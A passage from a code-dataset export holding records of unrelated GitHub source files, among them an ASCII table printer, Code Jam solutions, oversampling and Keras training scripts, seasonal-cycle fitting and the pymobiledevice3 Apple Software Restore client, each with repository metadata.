MAX_DEPTH = 0\n for col in self.columns:\n MAX_DEPTH = max(col.depth, MAX_DEPTH)\n\n # print the keys\n for index in range(MAX_DEPTH):\n for col in self.columns:\n print(\"{2}{1:^{0}}\".format(col.get_width(), col.get_line(index), VERTICAL) , end=\"\")\n print(VERTICAL)\n \n # print bottom of keys\n print(LEFT_PROTRUDE, end='')\n for index, col in enumerate(self.columns):\n print(HORIZONTAL * col.get_width(), end='')\n if index + 1 == len(self.columns):\n print(RIGHT_PROTRUDE)\n else:\n print(CROSS, end='')\n\n # loop over each row of each column now, printing out each line of each cell\n MAX_DAUGHTERS = 0\n for col in self.columns:\n MAX_DAUGHTERS = max(MAX_DAUGHTERS, col.get_total_daughters())\n\n for row in range(MAX_DAUGHTERS):\n # get maximum depth for row 1\n MAX_DEPTH = 0\n for col in self.columns:\n MAX_DEPTH = max(MAX_DEPTH, col.get_cell(row).get_depth())\n\n # print row \"row\"\n for depth in range(MAX_DEPTH):\n for col in self.columns:\n print(\"{2}{1:^{0}}\".format(col.get_width(), col.get_cell(row).get_line(depth), VERTICAL) , end=\"\")\n print(VERTICAL)\n\n # line\n if row + 1 == MAX_DAUGHTERS:\n print(BOTTOM_LEFT, end='')\n else:\n print(LEFT_PROTRUDE, end='')\n for _index, _col in enumerate(self.columns):\n print(HORIZONTAL * _col.get_width(), end='')\n if _index + 1 == len(self.columns):\n if row + 1 == MAX_DAUGHTERS:\n print(BOTTOM_RIGHT)\n else:\n print(RIGHT_PROTRUDE)\n else:\n if row + 1 == MAX_DAUGHTERS:\n print(BOTTOM_PROTRUDE, end='')\n else:\n print(CROSS, end='')\n\n def show_csv(self):\n # print headers\n headers = []\n for col in self.columns:\n headers.append(col.text)\n print(\",\".join(headers))\n\n # print everything else\n MAX_DAUGHTERS = 0\n for col in self.columns:\n MAX_DAUGHTERS = max(MAX_DAUGHTERS, col.get_total_daughters())\n\n for row in range(MAX_DAUGHTERS):\n this_row = []\n for col in self.columns:\n try: \n this_row.append(col.get_cell(row).text)\n except:\n this_row.append('')\n print(\",\".join(this_row))\n\n def show_json(self):\n items = []\n MAX_DAUGHTERS = 0\n for col in self.columns:\n MAX_DAUGHTERS = max(MAX_DAUGHTERS, col.get_total_daughters())\n\n \"\"\"\n {\n items:[\n {\"apple\" : value, \"orange\": value1, ...}, # an item in items\n {\"apple\" : value2, \"orange\":value3, ...},... # order is broken\n ]\n }\n\n \"\"\"\n\n for i in range(MAX_DAUGHTERS):\n item = {} # OrderedDict({}) is an alternative. This leaves OrderedDicts in the json output, which looks funny. Plus json doesn't need to be ordered anyways\n for col in self.columns:\n try:\n item[col.text] = col.daughter_cells[i].text\n except:\n item[col.text] = \"\"\n items.append(item)\n print({\"items\":items})\n\n\"\"\"\nif __name__ == \"__main__\":\n # example input\n data = OrderedDict([('apple', [40,50,60,70]), ('banana', [3,1,2]), ('orange', [200]), ('pear', [8,8,90,7])])\n t = Table(data, max_total_width=int(sys.argv[1]), fast_mode=False)\n t.show()\n t.show_csv()\n t.show_json()\"\"\"\n","repo_name":"logdog/asciiTable","sub_path":"table.py","file_name":"table.py","file_ext":"py","file_size_in_byte":11592,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"23545555511","text":"#!/usr/bin/env python3\n\nfor case_num in range(int(input())):\n # O(2^n) :(\n line = input().split()\n pancakes = [c == '+' for c in line[0]]\n flip_size = int(line[1])\n possible_flips = len(pancakes) + 1 - flip_size\n for i in range(2 ** possible_flips):\n bits = [(i >> j) & 1 for j in range(possible_flips)]\n new_pancakes = pancakes[:]\n for j in range(possible_flips):\n if bits[j]:\n for k in range(flip_size):\n new_pancakes[j + k] = not new_pancakes[j + k]\n if all(new_pancakes):\n print('Case #%d: %d' % (case_num + 1, bits.count(True)))\n break\n else:\n print('Case #%d: IMPOSSIBLE' % (case_num + 1,))\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_199/3145.py","file_name":"3145.py","file_ext":"py","file_size_in_byte":720,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"18377253134","text":"# -*- coding: utf-8 -*\nfrom sklearn.preprocessing import StandardScaler\nfrom model.load_data import load_data, split_test_data\nfrom sklearn import tree\nfrom sklearn.metrics import roc_auc_score, classification_report, accuracy_score\nfrom imblearn.over_sampling import RandomOverSampler, SMOTE, ADASYN\n\n\n'''\nOSIBD\n(1)准备多数类子集和少数类子集\n(2)去噪声和边界实例来改善类不平衡\n(3)少数类上过采样\n(4)形成平衡的数据集,应用C4.5\n'''\n\n\ndef get_maj_min_data(df=None):\n majroity = df[df.binaryCategory == 1]\n minroity = df[df.binaryCategory == -1]\n X_majroity = majroity.ix[:, 0:-1]\n X_minroity = minroity.ix[:, 0:-1]\n y_majority = majroity.ix[:, -1]\n y_minroity = minroity.ix[:, -1]\n return X_majroity, X_minroity, y_majority, y_minroity\n\n\ndef osibd(X_train, X_test, y_train, y_test):\n clf = tree.DecisionTreeClassifier(random_state=1995)\n clf.fit(X_train, y_train)\n y_pred_test = clf.predict(X_test)\n # 未过采样 0.5130139073499438\n # 随机过采样 0.5265026969279092\n # SMOTE 0.5022771818200142\n # SMOTE-Borderline1 0.5138753354115113\n # ADASYN 0.5120060424465268\n # print('ROC_AUC_SCORE:', roc_auc_score(y_test, y_pred_test))\n print('classification_report:\\n', classification_report(y_test, y_pred_test))\n print('accuracy_score:', accuracy_score(y_test, y_pred_test))\n\n\ndef randomOverSampler(X_train, y_train):\n ros = RandomOverSampler(random_state=1995)\n X_resampled, y_resampled = ros.fit_sample(X_train, y_train)\n majroity_size = y_resampled[y_resampled == 1]\n minroity_size = y_resampled[y_resampled == -1]\n print('majroity_size:', majroity_size.shape)\n print('minroity_size:', minroity_size.shape)\n return X_resampled, y_resampled\n\n\ndef smote(X_train, y_train):\n X_resampled, y_resampled = SMOTE(random_state=1995).fit_sample(X_train, y_train)\n majroity_size = y_resampled[y_resampled == 1]\n minroity_size = y_resampled[y_resampled == -1]\n print('majroity_size:', majroity_size.shape)\n print('minroity_size:', minroity_size.shape)\n return X_resampled, y_resampled\n\n\ndef smoteBorderline1(X_train, y_train):\n X_resampled, y_resampled = SMOTE(kind='borderline1', random_state=1995).fit_sample(X_train, y_train)\n majroity_size = y_resampled[y_resampled == 1]\n minroity_size = y_resampled[y_resampled == -1]\n print('majroity_size:', majroity_size.shape)\n print('minroity_size:', minroity_size.shape)\n return X_resampled, y_resampled\n\n\ndef adasyn(X_train, y_train):\n X_resampled, y_resampled = ADASYN(random_state=1995).fit_sample(X_train, y_train)\n majroity_size = y_resampled[y_resampled == 1]\n minroity_size = y_resampled[y_resampled == -1]\n print('过采样后majroity_size:', majroity_size.shape)\n print('过采样后minroity_size:', minroity_size.shape)\n return X_resampled, y_resampled\n\n\nif __name__ == '__main__':\n allData = load_data()\n X_majroity, X_minroity, y_majority, y_minroity = get_maj_min_data(allData)\n print('未过采样时majroity_size:', y_majority.shape[0])\n print('未过采样时minroity_size:', y_minroity.shape[0])\n X_train, X_test, y_train, y_test = split_test_data(allData)\n\n # 过采样方法\n X_resampled, y_resampled = randomOverSampler(X_train, y_train)\n\n # 预处理\n # ss = StandardScaler()\n # X_resampled = ss.fit_transform(X_resampled)\n # X_test = ss.transform(X_test)\n osibd(X_resampled, X_test, y_resampled, y_test)\n\n","repo_name":"wittonzhou/Credit","sub_path":"model/OSIBD.py","file_name":"OSIBD.py","file_ext":"py","file_size_in_byte":3485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"29403466168","text":"import json\n\nfrom PySide6 import QtWidgets\n\nfrom interface.ui_rank import Ui_Rank\nfrom qt_owner import QtOwner\nfrom server import req, Log, Status\nfrom task.qt_task import QtTaskBase\nfrom tools.str import Str\n\n\nclass RankView(QtWidgets.QWidget, Ui_Rank, QtTaskBase):\n def __init__(self):\n super(self.__class__, self).__init__()\n Ui_Rank.__init__(self)\n QtTaskBase.__init__(self)\n\n self.isInitKind = False\n self.setupUi(self)\n\n self.isInit = False\n self.tabWidget.setCurrentIndex(0)\n self.tabWidget.currentChanged.connect(self.SwitchPage)\n\n def SwitchCurrent(self, **kwargs):\n self.Init()\n pass\n\n def SwitchPage(self, index):\n if index == 0 and self.h24BookList.count() <= 0:\n self.AddHttpTask(req.RankReq(\"H24\"), self.InitBack, backParam=\"H24\")\n elif index == 1 and self.d7BookList.count() <= 0:\n self.AddHttpTask(req.RankReq(\"D7\"), self.InitBack, backParam=\"D7\")\n elif index == 2 and self.d30BookList.count() <= 0:\n self.AddHttpTask(req.RankReq(\"D30\"), self.InitBack, backParam=\"D30\")\n elif index == 3 and not self.isInitKind:\n QtOwner().ShowLoading()\n self.AddHttpTask(req.KnightRankReq(), self.InitKindBack)\n return\n\n def Init(self):\n if self.isInit:\n return\n self.isInit = True\n QtOwner().ShowLoading()\n self.AddHttpTask(req.RankReq(\"H24\"), self.InitBack, backParam=\"H24\")\n # self.AddHttpTask(req.RankReq(\"D7\"), self.InitBack, backParam=\"D7\")\n # self.AddHttpTask(req.RankReq(\"D30\"), self.InitBack, backParam=\"D30\")\n\n def InitBack(self, raw, backParam):\n QtOwner().CloseLoading()\n try:\n if backParam == \"H24\":\n bookList = self.h24BookList\n elif backParam == \"D7\":\n bookList = self.d7BookList\n elif backParam == \"D30\":\n bookList = self.d30BookList\n else:\n assert False\n\n st = raw[\"st\"]\n if st == Status.Ok:\n data = json.loads(raw[\"data\"])\n for v in data.get(\"data\").get(\"comics\"):\n bookList.AddBookByDict(v)\n else:\n QtOwner().ShowError(Str.GetStr(st))\n except Exception as es:\n Log.Error(es)\n self.isInit = False\n\n def InitKindBack(self, raw):\n QtOwner().CloseLoading()\n try:\n data = json.loads(raw[\"data\"])\n if data.get(\"code\") == 200:\n self.isInitKind = True\n for index, v in enumerate(data.get(\"data\").get(\"users\")):\n self.kindList.AddUserKindItem(v, index+1)\n else:\n QtOwner().ShowError(raw[\"st\"])\n except Exception as es:\n Log.Error(es)\n self.isInit = False\n","repo_name":"tonquer/picacg-qt","sub_path":"src/view/category/rank_view.py","file_name":"rank_view.py","file_ext":"py","file_size_in_byte":2880,"program_lang":"python","lang":"en","doc_type":"code","stars":2823,"dataset":"github-code","pt":"61"} +{"seq_id":"23474644421","text":"#!/usr/bin/env python3\n\ndef int2dir(x):\n if x == '^':\n return 0\n if x == '>':\n return 1\n if x == 'v':\n return 2\n if x == '<':\n return 3\n\ndirs = ((-1, 0), (0, 1), (1, 0), (0, -1))\n\ndef move(p1, p2):\n return (p1[0] + p2[0], p1[1] + p2[1])\n\ndef is_in(p, r, c):\n return (0 <= p[0] and p[0] < r and 0 <= p[1] and p[1] < c)\n\ndef calcdir(arr, r, c):\n newarr = {}\n for a in arrows:\n newarr[a] = [arr[a], [None for d in range(4)]]\n for d in range(4):\n pos = move(a, dirs[d])\n while is_in(pos, r, c) and pos not in arr:\n pos = move(pos, dirs[d])\n if is_in(pos, r, c):\n newarr[a][1][d] = pos\n return newarr\n\n\ndef test(arr):\n for a in arr:\n if arr[a][1][arr[a][0]] is None:\n return False\n return True\n\ndef popr(arr):\n ret = 0\n for a in arr:\n opts = arr[a][1]\n if opts[arr[a][0]] == None:\n for i in range(4):\n if opts[i] is not None:\n arr[a][0] = i\n ret += 1\n break\n if opts[arr[a][0]] == None:\n return None\n return ret\n\n\nT = int(input())\n\nfor t in range(1, T + 1):\n r, c = (int(x) for x in input().split())\n\n arrows = {}\n\n for i in range(r):\n row = input()\n for j, char in enumerate(row):\n if char != '.':\n arrows[(i,j)] = int2dir(char)\n\n arrows = calcdir(arrows, r, c)\n ret = popr(arrows)\n print(\"Case #{}: {}\".format(t, 'IMPOSSIBLE' if ret == None else ret))\n\n\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_168/116.py","file_name":"116.py","file_ext":"py","file_size_in_byte":1597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"73813293635","text":"from queues import Queue\n\n\nclass TestCases:\n def test_enqueue(self):\n \"\"\"Inserts item at the back of the queue\"\"\"\n queue = Queue()\n\n queue.enqueue(\"foo\")\n queue.enqueue(\"bar\")\n queue.enqueue(\"baz\")\n\n assert queue.items.length == 3\n assert queue.items.tail.value == \"foo\"\n\n def test_dequeue(self, queue):\n \"\"\"Returns and removes item at the front of the queue\"\"\"\n assert queue.items.tail.value == \"foo\"\n dequeued = queue.dequeue()\n assert dequeued == \"foo\"\n","repo_name":"max-allen/algorithms_workbook","sub_path":"queues/tests/test_queue_construction.py","file_name":"test_queue_construction.py","file_ext":"py","file_size_in_byte":539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"41856840060","text":"import numpy as np\nimport xarray as xr\n\n\ndef fit_seasonal_cycle_harmonic(da, target_time=12, dim=\"time\", window_years=3):\n \"\"\"fits a seasonal cycle harmonic to data\n\n Parameters\n ----------\n da : xr.DataArray\n a 1D dataset with time as the dimension\n dim : str\n time dimension\n target_time : pd.DatetimeIndex, float\n can be either a float or a pd.DatetimeIndex. if a float,\n it represents the size of the time step as a fraction of a\n year. If it's a pd.DatetimeIndex, then the new output will\n be interpolated onto that new time stamp.\n\n Returns\n -------\n xr.DataArray\n A fitted output with time either as target_time as inputted,\n or if target_time is an integer, then as a datetime array\n centered roughly to the window width of the time step.\n \"\"\"\n from scipy.optimize import curve_fit\n from numpy import cos, sin, pi\n\n # from numba import njit\n from pandas import Series, DatetimeIndex\n\n # @njit\n def fit_seascycle_harmonic(x, a1, a2, a3, a4, a5, a6, a7):\n \"\"\"function to fit as defined by Peter\"\"\"\n return (\n a1\n + a2 * x\n + a3 * x**2\n + a4 * sin(2 * pi * x)\n + a5 * cos(2 * pi * x)\n + a6 * sin(4 * pi * x)\n + a7 * cos(4 * pi * x)\n )\n\n # decimal year\n decimal_year = da.time.dt.dayofyear / 366 + da.time.dt.year\n da_na = da.assign_coords(time=decimal_year).dropna(\"time\")\n\n y = da_na.data\n x = da_na.time.data\n\n t0 = x.min() // 1\n t1 = x.max() // 1\n\n if isinstance(target_time, DatetimeIndex):\n time_out = target_time.dayofyear / 366 + target_time.year\n elif isinstance(target_time, (int, float)):\n time_step = 1 / target_time\n time_out = np.arange(t0 + time_step / 2, t1, time_step)\n else:\n raise TypeError(\"target_time must be int or pd.DateTimeIndex\")\n\n fitted = {}\n for i0 in np.arange(t0, t1 + 1):\n i1 = i0 + window_years\n\n # mask limits x and y to window years\n wmask = (x > i0) & (x < i1)\n coefs = curve_fit(\n fit_seascycle_harmonic,\n x[wmask],\n y[wmask],\n p0=[300, 1.1, 0.01, -3, -7, 5.5, 5.5],\n )[0]\n\n # create estimates\n new_x = time_out[(time_out >= i0) & (time_out <= i1)].astype(float)\n new_y = fit_seascycle_harmonic(new_x, *coefs)\n\n new = {_decimal_year_to_datetime(k): v for k, v in zip(new_x, new_y)}\n\n # now the new data needs to be added to the specific time (k)\n for k in new:\n if k not in fitted:\n fitted[k] = [new[k]]\n else:\n fitted[k] += (new[k],)\n # for each key (time), take the average of the 3 or less points\n\n for k in fitted:\n fitted[k] = np.nanmean(fitted[k])\n # convert the fittedput to an xarray.dataarray\n fitted = Series(fitted).to_xarray().rename(index=\"time\")\n\n return fitted\n\n\ndef seascycl_fit_graven(da, n_years=3, dim=\"time\"):\n \"\"\"\n Fits a seasonal cycle to data using cos and sin functions.\n\n Using the approach defined in Graven et al. (2013)\n\n Note\n ----\n This function is slow with large datasets - it is recommended to use\n `seascycl_fit_climatology` when the dataset is large. This function\n is suited to small datasets with sparse data.\n\n Parameters\n ----------\n da : xarray.DataArray\n The data to fit a seasonal cycle to. Time dimension must be a time index\n n_years : int\n The number of years to fit the seasonal cycle to (a rolling window)\n dim : str\n The name of the time dimension. Must be a time index\n\n Returns\n -------\n xarray.Dataset\n The fitted seasonal cycle and the difference between the JJA and DJF\n \"\"\"\n\n def get_months_from_time(time, months, tile=1):\n \"\"\"\n gets the index of the given months in the time array\n will only give index for first year unless tile > 1\n \"\"\"\n\n # get the unique years from the time array with counts\n years = time.dt.year.values\n unique, counts = np.unique(years, return_counts=True)\n\n # assert that all counts are the same\n msg = \"this function does not work for unevenly spaced time\"\n assert np.all(counts == counts[0]), msg\n n_steps = counts[0]\n\n year_month = time.dt.month.values[years == unique[0]]\n\n # get the months that are in the list\n bool_idx = np.isin(year_month, months)\n # get the indices of the months that are in the list\n loc_idx = np.where(bool_idx)[0]\n\n # tile the indicies so the fit the given tile\n idxs = [loc_idx + i * n_steps for i in range(tile)]\n idxs = np.concatenate(idxs)\n\n return idxs\n\n from numba import njit\n from numpy import sin, cos, pi\n\n stride = _get_number_of_time_steps_in_year(da[dim])\n window = n_years * stride\n\n assert stride == 12, \"this function only works for monthly data\"\n assert n_years % 2, \"n_years must be an odd number\"\n\n def fit_sc(x, a1, a2, a3, a4, a5, a6, a7):\n \"\"\"function to fit as defined by Peter\"\"\"\n return (\n a1\n + a2 * x\n + a3 * x**2\n + a4 * sin(2 * pi * x)\n + a5 * cos(2 * pi * x)\n + a6 * sin(4 * pi * x)\n + a7 * cos(4 * pi * x)\n )\n\n dims = list(da.dims)\n dims.remove(dim)\n\n windowed = (\n # we do not center since this shifts the months by 6\n da.rolling(**{dim: window}, center=False, min_periods=stride)\n .construct(**{dim: \"time_step\"}, stride=stride)\n .stack(other=dims)\n .where(lambda x: x.notnull().sum(\"time_step\") > stride, drop=True)\n .assign_coords(time_step=(np.arange(window) % stride + 1) / stride)\n )\n\n fast_func = njit()(fit_sc)\n coefs = windowed.curvefit(\n coords=\"time_step\",\n func=fast_func,\n p0=[300, 1.1, 0.01, -3, -7, 5.5, 5.5],\n kwargs={\"maxfev\": 100},\n )\n\n seas_cycle = (\n # multiply out coefficients\n fit_sc(windowed.time_step, *coefs.curvefit_coefficients.T)\n .drop(\"param\")\n .assign_coords(time_step=lambda x: x.time_step * stride)\n .groupby(\"time_step\")\n .mean()\n .unstack()\n )\n\n idx_jja = get_months_from_time(da.time, [6, 7, 8])\n idx_djf = get_months_from_time(da.time, [12, 1, 2])\n jja = seas_cycle.isel(time_step=idx_jja).mean(dim=\"time_step\")\n djf = seas_cycle.isel(time_step=idx_djf).mean(dim=\"time_step\")\n\n out = xr.Dataset()\n out[\"seas_cycle\"] = seas_cycle\n out[\"jja_minus_djf\"] = jja - djf\n\n return out\n\n\ndef seascycl_fit_climatology(da, n_years=3, dim=\"time\"):\n \"\"\"\n Fit a seasonal cycle to the climatology of a time series.\n\n Parameters\n ----------\n da : xarray.DataArray\n window : int\n The number of months in the window.\n stride : int\n The number of months to advance the window.\n dim : str\n The dimension to use for the window.\n\n Returns\n -------\n xarray.Dataset\n The seasonal cycle and the difference between the JJA and DJF\n \"\"\"\n\n stride = _get_number_of_time_steps_in_year(da[dim])\n assert stride == 12, \"this function only works for monthly data\"\n\n window = n_years * stride\n\n dims = list(da.dims)\n dims.remove(dim)\n seas_cycle = (\n # we do not center since this shifts the months by 6\n da.rolling(**{dim: window}, center=False, min_periods=stride)\n .construct(**{dim: \"month\"}, stride=stride)\n .assign_coords(month=np.arange(window) % 12 + 1)\n .groupby(\"month\")\n .mean()\n )\n\n mon_avg = lambda x, m: x.sel(month=m).mean(\"month\")\n out = xr.Dataset()\n out[\"seas_cycle\"] = seas_cycle\n out[\"jja_minus_djf\"] = mon_avg(seas_cycle, [6, 7, 8]) - mon_avg(\n seas_cycle, [12, 1, 2]\n )\n\n return out\n\n\ndef _get_number_of_time_steps_in_year(time, raise_if_uneven=True):\n \"\"\"\n Get the number of time steps in a year (e.g. months, days, etc.)\n \"\"\"\n # get the unique years from the time array with counts\n years = time.dt.year.values\n unique, counts = np.unique(years, return_counts=True)\n\n all_the_same = np.all(counts == counts[0])\n if not all_the_same and raise_if_uneven:\n raise ValueError(f\"time array is not evenly spaced: {time}\")\n else:\n return counts[0]\n\n\ndef _decimal_year_to_datetime(decimal_year):\n from datetime import datetime, timedelta\n from pandas import Timestamp\n\n t = decimal_year\n year = int(t)\n ndays_in_year = 365 if (year % 4) else 366\n day = int(np.around((t - year) * ndays_in_year)) - 1\n time = Timestamp(datetime(int(year), 1, 1) + timedelta(days=day))\n\n return time\n","repo_name":"lukegre/all_my_code","sub_path":"all_my_code/stats/seas_cycle.py","file_name":"seas_cycle.py","file_ext":"py","file_size_in_byte":8777,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"17923893857","text":"import hashlib\nimport logging\nimport os\nimport plistlib\nimport typing\n\nfrom tqdm import trange\n\nfrom pymobiledevice3.exceptions import PyMobileDevice3Exception\nfrom pymobiledevice3.service_connection import LockdownServiceConnection\n\nASR_VERSION = 1\nASR_STREAM_ID = 1\nASR_PORT = 12345\nASR_FEC_SLICE_STRIDE = 40\nASR_PACKETS_PER_FEC = 25\nASR_PAYLOAD_PACKET_SIZE = 1450\nASR_PAYLOAD_CHUNK_SIZE = 0x20000\nASR_CHECKSUM_CHUNK_SIZE = ASR_PAYLOAD_CHUNK_SIZE\n\nlogger = logging.getLogger(__name__)\n\n\nclass ASRClient(object):\n \"\"\"\n ASR — Apple Software Restore\n \"\"\"\n\n SERVICE_PORT = ASR_PORT\n\n def __init__(self, udid: str):\n self.service = LockdownServiceConnection.create_using_usbmux(udid, self.SERVICE_PORT, connection_type='USB')\n\n # receive Initiate command message\n data = self.recv_plist()\n logger.debug(f'got command: {data}')\n\n command = data.get('Command')\n if command != 'Initiate':\n raise PyMobileDevice3Exception(f'invalid command received: {command}')\n\n self.checksum_chunks = data.get('Checksum Chunks', False)\n logger.debug(f'Checksum Chunks: {self.checksum_chunks}')\n\n def recv_plist(self) -> typing.Mapping:\n buf = b''\n while not buf.endswith(b'\\n'):\n buf += self.service.recv()\n return plistlib.loads(buf)\n\n def send_plist(self, plist: typing.Mapping):\n logger.debug(plistlib.dumps(plist).decode())\n self.service.sendall(plistlib.dumps(plist))\n\n def send_buffer(self, buf: bytes):\n self.service.sendall(buf)\n\n def handle_oob_data_request(self, packet: typing.Mapping, filesystem: typing.IO):\n oob_length = packet['OOB Length']\n oob_offset = packet['OOB Offset']\n filesystem.seek(oob_offset, os.SEEK_SET)\n\n oob_data = filesystem.read(oob_length)\n assert len(oob_data) == oob_length\n\n self.send_buffer(oob_data)\n\n def perform_validation(self, filesystem: typing.IO):\n filesystem.seek(0, os.SEEK_END)\n length = filesystem.tell()\n filesystem.seek(0, os.SEEK_SET)\n\n payload_info = {\n 'Port': 1,\n 'Size': length,\n }\n\n packet_info = dict()\n if self.checksum_chunks:\n packet_info['Checksum Chunk Size'] = ASR_CHECKSUM_CHUNK_SIZE\n\n packet_info['FEC Slice Stride'] = ASR_FEC_SLICE_STRIDE\n packet_info['Packet Payload Size'] = ASR_PAYLOAD_PACKET_SIZE\n packet_info['Packets Per FEC'] = ASR_PACKETS_PER_FEC\n packet_info['Payload'] = payload_info\n packet_info['Stream ID'] = ASR_STREAM_ID\n packet_info['Version'] = ASR_VERSION\n\n self.send_plist(packet_info)\n\n while True:\n packet = self.recv_plist()\n logger.debug(f'perform_validation: {packet}')\n command = packet['Command']\n\n if command == 'Payload':\n break\n\n elif command == 'OOBData':\n self.handle_oob_data_request(packet, filesystem)\n\n else:\n raise PyMobileDevice3Exception(f'unknown packet: {packet}')\n\n def send_payload(self, filesystem: typing.IO):\n filesystem.seek(0, os.SEEK_END)\n length = filesystem.tell()\n filesystem.seek(0, os.SEEK_SET)\n\n for _ in trange(0, length, ASR_PAYLOAD_CHUNK_SIZE, dynamic_ncols=True):\n chunk = filesystem.read(ASR_PAYLOAD_CHUNK_SIZE)\n\n if self.checksum_chunks:\n chunk += hashlib.sha1(chunk).digest()\n\n self.send_buffer(chunk)\n","repo_name":"doronz88/pymobiledevice3","sub_path":"pymobiledevice3/restore/asr.py","file_name":"asr.py","file_ext":"py","file_size_in_byte":3540,"program_lang":"python","lang":"en","doc_type":"code","stars":600,"dataset":"github-code","pt":"61"} +{"seq_id":"39415818451","text":"# ! /usr/bin/python\n# -*- coding: utf-8 -*-\n\nfrom __future__ import print_function\n\nimport arrow\nimport arrow.parser\n\nfrom lib import fields\n\n\nclass DateToInteger(fields.Integer):\n def __init__(self, default=0, **kwargs):\n super(DateToInteger, self).__init__(default=default, **kwargs)\n\n def format(self, value):\n try:\n if value is None:\n return self.default\n if type(value).__name__ == 'int':\n return value\n else:\n if not value.strip():\n return self.default\n return arrow.get(value).timestamp\n except (ValueError, arrow.parser.ParserError) as ve:\n raise fields.MarshallingException(ve)\n\n\ndef dfs_dict(node, api_definitions=None):\n type_format = node.get(\"format\")\n attribute = node.get('attribute')\n node_type = type_format if type_format == 'timestamp' else node.get(\"type\")\n if not node_type:\n ref = node.get('$ref')\n _prefix, ref_node = ref.rsplit('/', 1)\n assert _prefix == '#/definitions' and api_definitions\n return dfs_dict(api_definitions[ref_node])\n if node_type == \"object\":\n nest_dict = {}\n sub_properties = node.get(\"properties\")\n if not sub_properties:\n return fields.Raw(attribute=attribute)\n for subnode in sub_properties.items():\n nest_dict[subnode[0]] = dfs_dict(subnode[1], api_definitions)\n return fields.Nested(nest_dict, attribute=attribute)\n elif node_type == \"array\":\n return fields.List(dfs_dict(node.get(\"items\"), api_definitions), attribute=attribute, default=[])\n elif node_type == 'string':\n return fields.String(default='', attribute=attribute)\n elif node_type == 'integer':\n return fields.Integer(default=-1, attribute=attribute)\n elif node_type == 'timestamp':\n return DateToInteger(default=0, attribute=attribute)\n elif node_type == 'boolean':\n return fields.Boolean(attribute=attribute)\n else:\n raise TypeError(str(node_type) + 'not definition')\n\n\nif __name__ == '__main__':\n pass\n","repo_name":"magigo/json_chaker","sub_path":"lib/my_convertor.py","file_name":"my_convertor.py","file_ext":"py","file_size_in_byte":2128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40634805402","text":"from typing import final\nimport tensorflow as tf\nfrom keras.callbacks import EarlyStopping\nfrom keras.optimizer_v2.adadelta import Adadelta\nimport keras.regularizers as regularizers\nfrom matplotlib import pyplot\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Flatten, MaxPooling2D, Conv2D, BatchNormalization, Input, Dropout, \\\n TimeDistributed\nfrom models.autoencoder.autoencoder import ENCODER_MODEL_NAME\nfrom training.training_utils import TRAIN_SET_PATH_MFCCS, TEST_SET_PATH_MFCCS,load_dataset, get_label_number, \\\n one_hot_labels_to_integer_labels, \\\n sparse_categorical_speaker_accuracy_mfccs, sparse_top_k_categorical_speaker_accuracy_mfccs, \\\n speaker_n_states_in_top_k_accuracy_mfccs\n\n\n_EPOCHS_LOAD_REC: final = 1000\n_VERSION_LOAD_REC: final = 1.0\n_REC_AUTOENC_PATH: final = f\"fitted_autoencoder/lstm/autoencoder_lstm_{_EPOCHS_LOAD_REC}_epochs_v{_VERSION_LOAD_REC}\"\n\n\ndef main():\n # Load dataset and labels\n train_mfccs, train_mfccs_labels = load_dataset(TRAIN_SET_PATH_MFCCS)\n test_mfccs, test_mfccs_labels = load_dataset(TEST_SET_PATH_MFCCS)\n total_state_number = get_label_number(train_mfccs_labels)\n\n # Get input shapes\n input_shape_rec_branch = (None, ) + train_mfccs.shape[1:]\n\n # Set model parameters\n tail_dense_units = 512\n\n # Set model training parameters\n epochs = 1\n batch_size = 100\n\n loss = tf.keras.losses.SparseCategoricalCrossentropy(\n from_logits=False,\n name='sparse_categorical_crossentropy'\n )\n optimizer = Adadelta(\n learning_rate=1,\n rho=0.95,\n epsilon=1e-7,\n name='adadelta_optimizer'\n )\n metrics = [tf.keras.metrics.SparseCategoricalAccuracy(name=\"Accuracy\", dtype=None),\n tf.keras.metrics.SparseTopKCategoricalAccuracy(k=8, name=\"TopK Accuracy\", dtype=None),\n sparse_top_k_categorical_speaker_accuracy_mfccs,\n sparse_categorical_speaker_accuracy_mfccs,\n speaker_n_states_in_top_k_accuracy_mfccs]\n callbacks = [\n EarlyStopping(monitor='val_loss', patience=100, min_delta=0.001, restore_best_weights=True)\n ]\n\n version = 0.4 # For easy saving of multiple model versions\n\n # Instantiate the model and compile it\n model = Sequential()\n model.add(Input(shape=(train_mfccs.shape[1:])))\n model.add(Dense(units=tail_dense_units,\n activation=tf.keras.layers.LeakyReLU(alpha=0.1),\n kernel_regularizer=regularizers.L1(1e-5)))\n model.add(Dropout(rate=0.5))\n model.add(Dense(units=tail_dense_units,\n activation=tf.keras.layers.LeakyReLU(alpha=0.1),\n kernel_regularizer=regularizers.L1(1e-5)))\n model.add(Dropout(rate=0.5))\n model.add(Dense(total_state_number,\n activation='softmax',\n activity_regularizer=regularizers.L1(1e-5)))\n model.build(input_shape_rec_branch)\n model.compile(optimizer=optimizer, loss=loss, metrics=metrics)\n model.summary(expand_nested=True)\n\n # Convert one-hot encoded labels to integer labels\n labels_train = one_hot_labels_to_integer_labels(train_mfccs_labels)\n labels_test = one_hot_labels_to_integer_labels(test_mfccs_labels)\n\n # Train the model\n history = model.fit(\n x=train_mfccs,\n y=labels_train,\n epochs=epochs,\n batch_size=batch_size,\n shuffle=True,\n callbacks=callbacks,\n validation_data=(test_mfccs, labels_test)\n )\n # Save the model to file\n model.save(f'fitted_mlp_predictor/mlp_predictor_{epochs}_epochs_v{version}')\n\n # Plot results loss\n pyplot.plot(history.history['loss'], label='train')\n pyplot.plot(history.history['val_loss'], label='test')\n pyplot.legend()\n pyplot.show()\n\n\nif __name__ == \"__main__\":\n 